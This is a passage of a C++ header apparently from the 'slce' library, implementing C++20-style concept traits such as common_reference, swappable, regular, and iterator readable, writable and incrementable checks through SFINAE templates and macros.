#define SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, uqual ) \
template< typename T, typename U > \
struct basic_common_reference_type< T, U, typename voider< \
typename std::enable_if< \
has_ ## tqual ## _qual< T >::value && \
has_ ## uqual ## _qual< U >::value \
>::type, \
typename std::basic_common_reference< \
typename remove_cvref< T >::type, \
typename remove_cvref< U >::type, \
add_ ## tqual ## _qual_t, \
add_ ## uqual ## _qual_t \
>::type \
>::type > { \
using type = typename std::basic_common_reference< \
typename remove_cvref< T >::type, \
typename remove_cvref< U >::type, \
add_ ## tqual ## _qual_t, \
add_ ## uqual ## _qual_t \
>::type; \
};
#define SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( tqual ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, no ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, c ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, v ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, l ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, r ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, cv ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, cl ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, cr ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, vl ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, vr ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, cvl ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, cvr )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( no )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( c )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( v )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( l )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( r )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( cv )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( cl )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( cr )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( vl )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( vr )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( cvl )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( cvr )
SLCE_BOOLEAN_TRAIT_T2(
has_basic_common_reference_type,
typename basic_common_reference_type< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct decltype_common_reference_type {};
template< typename T, typename U >
struct decltype_common_reference_type< T, U, typename voider<
decltype( false ? std::declval< T >() : std::declval< U >() )
>::type > {
using type = decltype( false ? std::declval< T >() : std::declval< U >() );
};
SLCE_BOOLEAN_TRAIT_T2(
has_decltype_common_reference_type,
typename decltype_common_reference_type< T, U >::type
)
SLCE_BOOLEAN_TRAIT_T2(
has_common_type,
typename std::common_type< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct common_reference : public std::false_type {};
template< typename T, typename U >
struct common_reference< T, U, typename std::enable_if<
has_simple_common_reference_type< T, U >::value
>::type > : public simple_common_reference_type< T, U > {};
template< typename T, typename U >
struct common_reference< T, U, typename std::enable_if<
!has_simple_common_reference_type< T, U >::value &&
has_basic_common_reference_type< T, U >::value
>::type > : public basic_common_reference_type< T, U > {};
template< typename T, typename U >
struct common_reference< T, U, typename std::enable_if<
!has_simple_common_reference_type< T, U >::value &&
!has_basic_common_reference_type< T, U >::value &&
has_decltype_common_reference_type< T, U >::value
>::type > : public decltype_common_reference_type< T, U > {};
template< typename T, typename U >
struct common_reference< T, U, typename std::enable_if<
!has_simple_common_reference_type< T, U >::value &&
!has_basic_common_reference_type< T, U >::value &&
!has_decltype_common_reference_type< T, U >::value &&
has_common_type< T, U >::value
>::type > : public std::common_type< T, U > {};
}
template< typename ...Args >
struct common_reference {};
template< typename T0 >
struct common_reference< T0 > { using type = T0; };
template< typename T0, typename T1 >
struct common_reference< T0, T1 > : public detail::common_reference< T0, T1 > {};
template< typename T0, typename T1, typename T2, typename ...Args >
struct common_reference< T0, T1, T2, Args... > : public common_reference< typename common_reference< T0, T1 >::type, T2, Args... > {};
template< typename T, typename U, typename Enable = void >
struct is_common_reference : public std::false_type {};
template< typename T, typename U >
struct is_common_reference< T, U, typename detail::voider<
typename common_reference< T, U >::type, typename common_reference< U, T >::type
>::type > : public std::integral_constant< bool,
std::is_same<
typename common_reference< T, U >::type,
typename common_reference< U, T >::type
>::value &&
std::is_convertible< T, typename common_reference< T, U >::type >::value &&
std::is_convertible< U, typename common_reference< T, U >::type >::value
> {};
SLCE_HELPER( CommonReference, is_common_reference )
template< typename T, typename U, typename Enable = void >
struct is_common : public std::false_type {};
template< typename T, typename U >
struct is_common< T, U, typename detail::voider<
decltype( static_cast< typename std::common_type< T, U >::type >( std::declval< T >() ) ),
decltype( static_cast< typename std::common_type< T, U >::type >( std::declval< U >() ) )
>::type > : public std::integral_constant< bool,
std::is_same<
typename std::common_type< T, U >::type,
typename std::common_type< U, T >::type
>::value &&
is_common_reference<
typename std::add_lvalue_reference< const T >::type,
typename std::add_lvalue_reference< const U >::type
>::value &&
is_common_reference<
typename std::add_lvalue_reference< typename std::common_type< T, U >::type >::type,
typename common_reference<
typename std::add_lvalue_reference< const T >::type,
typename std::add_lvalue_reference< const U >::type
>::type
>::value
> {};
template< typename T >
using is_integral = std::is_integral< T >;
SLCE_HELPER( Integral, is_integral )
template< typename T, typename Enable = void >
struct is_signed_integral : public std::false_type {};
template< typename T >
struct is_signed_integral< T,
typename std::enable_if< is_integral< T >::value >::type
> : public std::is_signed< T > {};
SLCE_HELPER( SignedIntegral, is_signed_integral )
template< typename T, typename Enable = void >
struct is_unsigned_integral : public std::false_type {};
template< typename T >
struct is_unsigned_integral< T,
typename std::enable_if< is_integral< T >::value >::type
> : public std::is_unsigned< T > {};
SLCE_HELPER( UnsignedIntegral, is_unsigned_integral )
template< typename L, typename R, typename Enable = void >
struct is_assignable : public std::false_type {};
template< typename L, typename R >
struct is_assignable< L, R, typename std::enable_if<
is_same<
decltype( std::declval< L >() = std::forward< R >( std::declval< R&& >() ) ),
L
>::value
>::type > : public std::integral_constant< bool,
std::is_lvalue_reference< L >::value &&
is_common_reference<
const typename std::remove_reference< L >::type&,
const typename std::remove_reference< R >::type&
>::value
> {};
SLCE_HELPER( Assignable, is_assignable )
namespace detail {
namespace using_std {
using namespace std;
template< typename T, typename U, typename Enable = void >
struct is_std_swappable : public std::false_type {};
template< typename T, typename U >
struct is_std_swappable< T, U, typename voider<
decltype( swap( std::declval< T& >(), std::declval< U& >() ) )
>::type > : public std::true_type {};
}
template< typename T, typename U, typename Enable = void >
struct is_range_swappable : public std::false_type {};
#ifdef __cpp_lib_ranges
template< typename T, typename U >
struct is_range_swappable< T, U, typename voider<
decltype( std::swap_ranges( std::declval< T& >(), std::declval< U& >() ) )
>::type > : public std::true_type {};
#endif
template< typename T, typename U, typename Enable = void >
struct is_swappable_type : public std::false_type {};
template< typename T >
struct is_swappable_type< T, T, typename std::enable_if<
std::is_move_constructible< T >::value &&
is_assignable< T&, T >::value
>::type > : public std::true_type {};
}
template< typename T, typename U >
struct is_swappable_with : public std::integral_constant< bool,
detail::using_std::is_std_swappable< T, U >::value ||
detail::is_range_swappable< T, U >::value ||
detail::is_swappable_type< T, U >::value
> {};
SLCE_HELPER( SwappableWith, is_swappable_with )
template< typename T >
struct is_swappable : public is_swappable_with< T, T > {};
SLCE_HELPER( Swappable, is_swappable )
template< typename T >
using is_destructible = std::is_nothrow_destructible< T >;
SLCE_HELPER( Destructible, is_destructible )
template< typename T, typename ...Args >
struct is_constructible : public std::integral_constant< bool,
is_destructible< T >::value &&
std::is_constructible< T, Args... >::value
> {};
SLCE_HELPER( Constructible, is_constructible )
template< typename T >
struct is_default_constructible : public is_constructible< T > {};
SLCE_HELPER( DefaultConstructible, is_default_constructible )
template< typename T >
struct is_move_constructible : public std::integral_constant< bool,
is_constructible< T, T >::value &&
is_convertible_to< T, T >::value
> {};
SLCE_HELPER( MoveConstructible, is_move_constructible )
template< typename T >
struct is_copy_constructible : public std::integral_constant< bool,
is_move_constructible< T >::value &&
is_constructible< T, T& >::value &&
is_convertible_to< T&, T >::value &&
is_constructible< T, const T& >::value &&
is_convertible_to< const T&, T >::value &&
is_constructible< T, const T >::value &&
is_convertible_to< const T, T >::value
> {};
SLCE_HELPER( CopyConstructible, is_copy_constructible )
template< typename T >
struct is_movable : public std::integral_constant< bool,
std::is_object< T >::value &&
is_move_constructible< T >::value &&
is_assignable< T&, T >::value &&
is_swappable< T >::value
> {};
SLCE_HELPER( Movable, is_movable )
template< typename T, typename Enable = void >
struct is_boolean : public std::false_type {};
template< typename T >
struct is_boolean< T, typename detail::voider<
decltype( !std::declval< const T& >() ),
decltype( std::declval< const T& >() && std::declval< bool >() ),
decltype( std::declval< const T& >() || std::declval< bool >() ),
decltype( std::declval< const T& >() && std::declval< const T& >() ),
decltype( std::declval< bool >() && std::declval< const T& >() ),
decltype( std::declval< const T& >() || std::declval< const T& >() ),
decltype( std::declval< bool >() || std::declval< const T& >() ),
decltype( std::declval< const T& >() == std::declval< const T& >() ),
decltype( std::declval< const T& >() == std::declval< bool >() ),
decltype( std::declval< bool >() == std::declval< const T& >() ),
decltype( std::declval< const T& >() != std::declval< const T& >() ),
decltype( std::declval< const T& >() != std::declval< bool >() ),
decltype( std::declval< bool >() != std::declval< const T& >() )
>::type > : public std::integral_constant< bool,
is_movable< typename detail::remove_cvref< T >::type >::value &&
is_convertible_to< const typename std::remove_reference< T >::type&, bool >::value &&
is_convertible_to< decltype( !std::declval< const T& >() ), bool >::value &&
is_same< decltype( std::declval< const T& >() && std::declval< bool >() ), bool >::value &&
is_same< decltype( std::declval< const T& >() || std::declval< bool >() ), bool >::value &&
is_same< decltype( std::declval< const T& >() && std::declval< const T& >() ), bool >::value &&
is_same< decltype( std::declval< bool >() && std::declval< const T& >() ), bool >::value &&
is_same< decltype( std::declval< const T& >() || std::declval< const T& >() ), bool >::value &&
is_same< decltype( std::declval< bool >() || std::declval< const T& >() ), bool >::value &&
is_convertible_to< decltype( std::declval< const T& >() == std::declval< const T& >() ), bool >::value &&
is_convertible_to< decltype( std::declval< const T& >() == std::declval< bool >() ), bool >::value &&
is_convertible_to< decltype( std::declval< bool >() == std::declval< const T& >() ), bool >::value &&
is_convertible_to< decltype( std::declval< const T& >() != std::declval< const T& >() ), bool >::value &&
is_convertible_to< decltype( std::declval< const T& >() != std::declval< bool >() ), bool >::value &&
is_convertible_to< decltype( std::declval< bool >() != std::declval< const T& >() ), bool >::value
> {};
SLCE_HELPER( Boolean, is_boolean )
namespace detail {
template< typename T, typename U, typename Enable = void >
struct is_weakly_equality_comparable_with : public std::false_type {};
template< typename T, typename U >
struct is_weakly_equality_comparable_with< T, U, typename detail::voider<
decltype( std::declval< const typename std::remove_reference< T >::type& >() == std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() != std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() == std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() != std::declval< const typename std::remove_reference< T >::type& >() )
>::type > : public std::integral_constant< bool,
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() == std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() != std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() == std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() != std::declval< const typename std::remove_reference< T >::type& >() ) >::value
> {};
}
template< typename T >
struct is_equality_comparable : public detail::is_weakly_equality_comparable_with< T, T > {};
SLCE_HELPER( EqualityComparable, is_equality_comparable )
template< typename T, typename U >
struct is_equality_comparable_with : public std::integral_constant< bool,
is_equality_comparable< T >::value &&
is_equality_comparable< U >::value &&
is_common_reference< const typename std::remove_reference< T >::type&, const typename std::remove_reference< U >::type& >::value &&
is_equality_comparable<
typename common_reference< const typename std::remove_reference< T >::type&, const typename std::remove_reference< U >::type& >::type
>::value &&
detail::is_weakly_equality_comparable_with< T, U >::value
> {};
SLCE_HELPER( EqualityComparableWith, is_equality_comparable_with )
template< typename T, typename Enable = void >
struct is_strict_totally_ordered : public std::false_type {};
template< typename T >
struct is_strict_totally_ordered< T, typename detail::voider<
decltype( std::declval< const typename std::remove_reference< T >::type& >() < std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() > std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() <= std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() >= std::declval< const typename std::remove_reference< T >::type& >() )
>::type > : public std::integral_constant< bool,
is_equality_comparable< T >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() < std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() > std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() <= std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() >= std::declval< const typename std::remove_reference< T >::type& >() ) >::value
> {};
SLCE_HELPER( StrictTotallyOrdered, is_strict_totally_ordered )
template< typename T, typename U, typename Enable = void >
struct is_strict_totally_ordered_with : public std::false_type {};
template< typename T, typename U >
struct is_strict_totally_ordered_with< T, U, typename detail::voider<
decltype( std::declval< const typename std::remove_reference< T >::type& >() < std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() > std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() <= std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() >= std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() < std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() > std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() <= std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() >= std::declval< const typename std::remove_reference< T >::type& >() )
>::type > : public std::integral_constant< bool,
is_strict_totally_ordered< T >::value &&
is_strict_totally_ordered< U >::value &&
is_equality_comparable_with< T, U >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() < std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() > std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() <= std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() >= std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() < std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() > std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() <= std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() >= std::declval< const typename std::remove_reference< T >::type& >() ) >::value
> {};
SLCE_HELPER( StrictTotallyOrderedWith, is_strict_totally_ordered_with )
template< typename T >
struct is_copyable : public std::integral_constant<
bool,
is_copy_constructible< T >::value &&
is_movable< T >::value &&
is_assignable< T&, const T& >::value
> {};
SLCE_HELPER( Copyable, is_copyable )
template< typename T >
struct is_semiregular : public std::integral_constant<
bool,
is_copyable< T >::value &&
is_default_constructible< T >::value
> {};
SLCE_HELPER( Semiregular, is_semiregular )
template< typename T >
struct is_regular : public std::integral_constant<
bool,
is_semiregular< T >::value &&
is_equality_comparable< T >::value
> {};
SLCE_HELPER( Regular, is_regular )
namespace detail {
template< typename T, typename Args, typename Enable = void >
struct is_invocable : public std::false_type {};
#ifdef __cpp_lib_invoke
template< typename F, template< typename ... > typename L, typename ... Args >
struct is_invocable< F, L< Args... >, typename voider<
decltype( std::invoke( std::declval< F&& >(), std::declval< Args&& >()... ) )
>::type > : public std::true_type {};
#endif
}
template< typename T, typename ...Args >
struct is_invocable : public detail::is_invocable< T, detail::lifter< Args... > > {};
SLCE_HELPER( Invocable, is_invocable )
template< typename T, typename ...Args >
struct is_regular_invocable : public is_invocable< T, Args... > {};
SLCE_HELPER( RegularInvokable, is_regular_invocable )
namespace detail {
template< typename T, typename Args, typename Enable = void >
struct is_predicate : public std::false_type {};
#ifdef __cpp_lib_invoke
template< typename F, template< typename ... > typename L, typename ... Args >
struct is_predicate< F, L< Args... >, typename voider<
decltype( std::invoke( std::declval< F&& >(), std::declval< Args&& >()... ) )
>::type > : public std::integral_constant<
bool,
::slce::is_regular_invocable< F, Args... >::value &&
std::is_same<
bool,
typename std::remove_cv< decltype( std::invoke( std::declval< F&& >(), std::declval< Args&& >()... ) ) >::type
>::value
> {};
#endif
}
template< typename F, typename ...Args >
struct is_predicate : public detail::is_predicate< F, detail::lifter< Args... > > {};
SLCE_HELPER( Predicate, is_predicate )
template< typename R, typename T, typename U >
struct is_relation : public std::integral_constant<
bool,
is_predicate< R, T, T >::value &&
is_predicate< R, U, U >::value &&
is_predicate< R, T, U >::value &&
is_predicate< R, U, T >::value
> {};
SLCE_HELPER( Relation, is_relation )
template< typename R, typename T, typename U >
struct is_strict_weak_order : public is_relation< R, T, U > {};
SLCE_HELPER( StrictWeakOrder, is_strict_weak_order )
namespace detail {
template< typename T >
using with_reference = T&;
template< typename T, typename Enable = void >
struct can_reference : public std::false_type {};
template< typename T >
struct can_reference< T, typename voider<
with_reference< T >
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct is_dereferenceable : public std::false_type {};
template< typename T >
struct is_dereferenceable< T, typename voider<
decltype( *std::declval< T& >() )
>::type > : public can_reference< decltype( *std::declval< T& >() ) > {};
}
#ifdef __cpp_lib_ranges
template< typename T >
using incrementable_traits = std::incrementable_traits< T >;
template< typename T >
using iter_difference_t = std::iter_difference_t< T >;
template< typename T >
using readable_traits = std::readable_traits< T >;
template< typename T >
using iter_value_t = std::iter_value_t< T >;
template< typename T >
using iter_reference_t = std::iter_reference_t< T >;
template< typename T >
using iter_rvalue_reference_t = std::iter_rvalue_reference_t< T >;
#else
namespace detail {
template< typename T, typename Enable = void >
struct has_dereference_type : public std::false_type {};
template< typename T >
struct has_dereference_type< T, typename voider<
typename T::difference_type
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct subtracted_type_is_integral : public std::false_type {};
template< typename T >
struct subtracted_type_is_integral< T, typename voider<
decltype( std::declval< const T& >() - std::declval< const T& >() )
>::type > : public std::is_integral< decltype( std::declval< const T& >() - std::declval< const T& >() ) > {};
template< typename T, typename Enable = void >
struct cond_value_type {};
template< typename T >
struct cond_value_type< T, typename std::enable_if<
std::is_object< T >::value
>::type > {
using value_type = typename std::remove_cv< T >::type;
};
}
template< typename, typename Enable = void >
struct incrementable_traits {};
template< typename T >
struct incrementable_traits< T*, typename std::enable_if<
std::is_object< T >::value &&
!( !detail::has_dereference_type< T >::value &&
detail::subtracted_type_is_integral< T >::value )
>::type > {
using difference_type = ptrdiff_t;
};
template< typename T >
struct incrementable_traits< const T > : incrementable_traits< T > {};
template< typename T >
struct incrementable_traits< T, typename std::enable_if<
detail::has_dereference_type< T >::value
>::type > {
using difference_type = typename T::difference_type;
};
template< typename T >
struct incrementable_traits< T, typename std::enable_if<
!detail::has_dereference_type< T >::value &&
detail::subtracted_type_is_integral< T >::value
>::type > {
using difference_type = std::make_signed_t< decltype( std::declval< T >() - std::declval< T >() ) >;
};
namespace detail {
template< typename T, typename Enable = void >
struct has_iterator_traits_difference_type : public std::false_type {};
template< typename T >
struct has_iterator_traits_difference_type< T, typename detail::voider<
typename std::iterator_traits< T >::difference_type
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct has_incrementable_traits_difference_type : public std::false_type {};
template< typename T >
struct has_incrementable_traits_difference_type< T, typename detail::voider<
typename incrementable_traits< T >::difference_type
>::type > : public std::true_type {};
}
template< typename T, typename Enable = void >
struct iter_difference {};
template< typename T >
struct iter_difference< T, typename std::enable_if<
detail::has_iterator_traits_difference_type< T >::value
>::type > {
using type = typename std::iterator_traits< T >::difference_type;
};
template< typename T >
struct iter_difference< T, typename std::enable_if<
!detail::has_iterator_traits_difference_type< T >::value &&
detail::has_incrementable_traits_difference_type< T >::value
>::type > {
using type = typename incrementable_traits< T >::difference_type;
};
template< typename T >
using iter_difference_t = typename iter_difference< T >::type;
template< typename T, typename Enable = void >
struct readable_traits {};
template< typename T >
struct readable_traits< T*, void > : public detail::cond_value_type< T > {};
template< typename T >
struct readable_traits< T, typename std::enable_if<
std::is_array< T >::value
>::type > {
using value_type = typename std::remove_cv< typename std::remove_extent_t< T >::type >::type;
};
template< typename T >
struct readable_traits< const T, void > : public readable_traits< T > {};
template< typename T >
struct readable_traits< T, typename detail::voider<
typename T::value_type
>::type > : public detail::cond_value_type< typename T::value_type > {};
template< typename T >
struct readable_traits< T, typename detail::voider<
typename T::element_type
>::type > : public detail::cond_value_type< typename T::element_type > {};
namespace detail {
template< typename T, typename Enable = void >
struct has_iterator_traits_value_type : public std::false_type {};
template< typename T >
struct has_iterator_traits_value_type< T, typename detail::voider<
typename std::iterator_traits< T >::value_type
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct has_readable_traits_value_type : public std::false_type {};
template< typename T >
struct has_readable_traits_value_type< T, typename detail::voider<
typename readable_traits< T >::value_type
>::type > : public std::true_type {};
}
template< typename T, typename Enable = void >
struct iter_value {};
template< typename T >
struct iter_value< T, typename std::enable_if<
detail::has_iterator_traits_value_type< T >::value
>::type > {
using type = typename std::iterator_traits< T >::value_type;
};
template< typename T >
struct iter_value< T, typename std::enable_if<
!detail::has_iterator_traits_value_type< T >::value &&
detail::has_readable_traits_value_type< T >::value
>::type > {
using type = typename readable_traits< T >::value_type;
};
template< typename T >
using iter_value_t = typename iter_value< T >::type;
template< typename T, typename Enable = void >
struct iter_reference {};
template< typename T >
struct iter_reference< T, typename std::enable_if<
detail::is_dereferenceable< T >::value
>::type > {
using type = decltype( *std::declval< T& >() );
};
template< typename T >
using iter_reference_t = typename iter_reference< T >::type;
namespace detail {
template< typename T >
auto iter_move_( T iter ) -> decltype( iter_move( std::declval< T >() ) ) {
return iter_move( iter );
}
template< typename T, typename Enable = void >
struct has_specialized_iter_move : public std::false_type {};
template< typename T >
struct has_specialized_iter_move< T, typename detail::voider<
decltype( iter_move_( std::declval< T >() ) )
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct dereferenceable_as_lvalue : public std::false_type {};
template< typename T >
struct dereferenceable_as_lvalue< T, typename std::enable_if<
std::is_lvalue_reference< decltype( *std::declval< T >() ) >::value
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct dereferenceable_as_rvalue : public std::false_type {};
template< typename T >
struct dereferenceable_as_rvalue< T, typename std::enable_if<
!std::is_lvalue_reference< decltype( *std::declval< T >() ) >::value
>::type > : public std::true_type {};
}
namespace range {
template< typename T >
auto iter_move( T iter ) -> typename std::enable_if<
detail::has_specialized_iter_move< T >::value,
decltype( detail::iter_move_( std::declval< T >() ) )
>::type {
return detail::iter_move_( iter );
}
template< typename T >
auto iter_move( T iter ) -> typename std::enable_if<
!detail::has_specialized_iter_move< T >::value &&
detail::dereferenceable_as_lvalue< T >::value,
decltype( std::move( *std::declval< T >() ) )
>::type {
return std::move( *iter );
}
template< typename T >
auto iter_move( T iter ) -> typename std::enable_if<
!detail::has_specialized_iter_move< T >::value &&
detail::dereferenceable_as_rvalue< T >::value,
decltype( *std::declval< T >() )
>::type {
return *iter;
}
}
template< typename T, typename Enable = void >
struct iter_rvalue_reference {};
template< typename T >
struct iter_rvalue_reference< T, typename detail::voider<
decltype( range::iter_move( std::declval< T& >() ) )
>::type > {
using type = decltype( range::iter_move( std::declval< T& >() ) );
};
template< typename T >
using iter_rvalue_reference_t = typename iter_rvalue_reference< T >::type;
#endif
namespace detail {
template< typename T, typename Enable = void >
struct is_cpp17_iterator : public std::false_type {};
template< typename T >
struct is_cpp17_iterator< T, typename std::enable_if<
is_copyable< T >::value &&
can_reference< decltype( *std::declval< T >() ) >::value &&
is_same< decltype( ++std::declval< T >() ), T& >::value &&
can_reference< decltype( *std::declval< T >()++ ) >::value
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct is_cpp17_input_iterator : public std::false_type {};
template< typename T >
struct is_cpp17_input_iterator< T, typename voider<
typename std::enable_if<
is_cpp17_iterator< T >::value &&
is_equality_comparable< T >::value &&
is_signed_integral< typename incrementable_traits< T >::difference_type >::value
>::type,
typename incrementable_traits< T >::difference_type,
typename readable_traits< T >::value_type,
typename common_reference<
iter_reference_t< T >&&,
typename readable_traits< T >::value_type&
>::type,
decltype( *std::declval< T >()++ ),
typename common_reference<
decltype( *std::declval< T >()++ )&&,
typename readable_traits< T >::value_type&
>::type
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct is_cpp17_forward_iterator : public std::false_type {};
template< typename T >
struct is_cpp17_forward_iterator< T, typename std::enable_if<
is_cpp17_input_iterator< T >::value &&
is_constructible< T >::value &&
std::is_lvalue_reference< iter_reference_t< T > >::value &&
is_same<
typename remove_cvref< iter_reference_t< T > >::type,
typename readable_traits< T >::value_type
>::value &&
is_convertible_to< decltype( std::declval< T >()++ ), const T& >::value &&
is_same< decltype( *std::declval< T >()++ ), iter_reference_t< T > >::value
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct is_cpp17_bidirectional_iterator : public std::false_type {};
template< typename T >
struct is_cpp17_bidirectional_iterator< T, typename std::enable_if<
is_cpp17_forward_iterator< T >::value &&
is_same< decltype( --std::declval< T >() ), T& >::value &&
is_convertible_to< decltype( std::declval< T >()-- ), const T& >::value &&
is_same< decltype( *std::declval< T >()-- ), iter_reference_t< T > >::value
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct is_cpp17_random_access_iterator : public std::false_type {};
template< typename T >
struct is_cpp17_random_access_iterator< T, typename std::enable_if<
is_cpp17_bidirectional_iterator< T >::value &&
is_strict_totally_ordered< T >::value &&
is_same< decltype( std::declval< T >() += std::declval< typename incrementable_traits< T >::difference_type >() ), T& >::value &&
is_same< decltype( std::declval< T >() -= std::declval< typename incrementable_traits< T >::difference_type >() ), T& >::value &&
is_same< decltype( std::declval< T >() + std::declval< typename incrementable_traits< T >::difference_type >() ), T >::value &&
is_same< decltype( std::declval< typename incrementable_traits< T >::difference_type >() + std::declval< T >() ), T >::value &&
is_same< decltype( std::declval< T >() - std::declval< typename incrementable_traits< T >::difference_type >() ), T >::value &&
is_same< decltype( std::declval< T >() - std::declval< T >() ), typename incrementable_traits< T >::difference_type >::value &&
is_convertible_to< iter_reference_t< T >, decltype( std::declval< T >()[ std::declval< typename incrementable_traits< T >::difference_type >() ] ) >::value
>::type > : public std::true_type {};
}
template< typename T, typename Enable = void >
struct is_readable : public std::false_type {};
template< typename T >
struct is_readable< T, typename detail::voider<
iter_value_t< T >,
iter_reference_t< T >,
iter_rvalue_reference_t< T >
>::type > : public std::true_type {};
SLCE_HELPER( Readable, is_readable )
template< typename Out, typename T, typename Enable = void >
struct is_writable : public std::false_type {};
template< typename Out, typename T >
struct is_writable< Out, T, typename detail::voider<
//decltype( *std::declval< Out&& >() = std::forward< T >( std::declval< T&& >() ) )//,
decltype( *std::forward< Out >( std::declval< Out&& >() ) = std::forward< T >( std::declval< T&& >() ) ),
decltype( const_cast< const iter_reference_t< Out >&& >( *std::declval< Out&& >() ) =
std::forward< T >( std::declval< T&& >() ) ),
decltype( const_cast< const iter_reference_t< Out >&& >( *std::forward< Out >( std::declval< Out&& >() ) ) =
std::forward< T >( std::declval< T&& >() ) )
>::type > : public std::true_type {};
SLCE_HELPER( Writable, is_writable )
template< typename T, typename Enable = void >
struct is_weakly_incrementable : public std::false_type {};
template< typename T >
struct is_weakly_incrementable< T, typename detail::voider<
typename std::enable_if<
is_semiregular< T >::value &&
is_signed_integral< iter_difference_t< T > >::value &&
is_same< decltype( ++std::declval< T& >() ), T& >::value
>::type,
iter_difference_t< T >,
decltype( std::declval< T& >()++ )
>::type > : public std::true_type {};
SLCE_HELPER( WeaklyIncrementable, is_weakly_incrementable )
template< typename T, typename Enable = void >
struct is_incrementable : public std::false_type {};
template< typename T >
struct is_incrementable< T, typename std::enable_if<
is_regular< T >::value &&
is_weakly_incrementable< T >::value &&
is_same< decltype( std::declval< T& >()++ ), T >::value
>::type > : public std::true_type {};
SLCE_HELPER( Incrementable, is_incrementable )
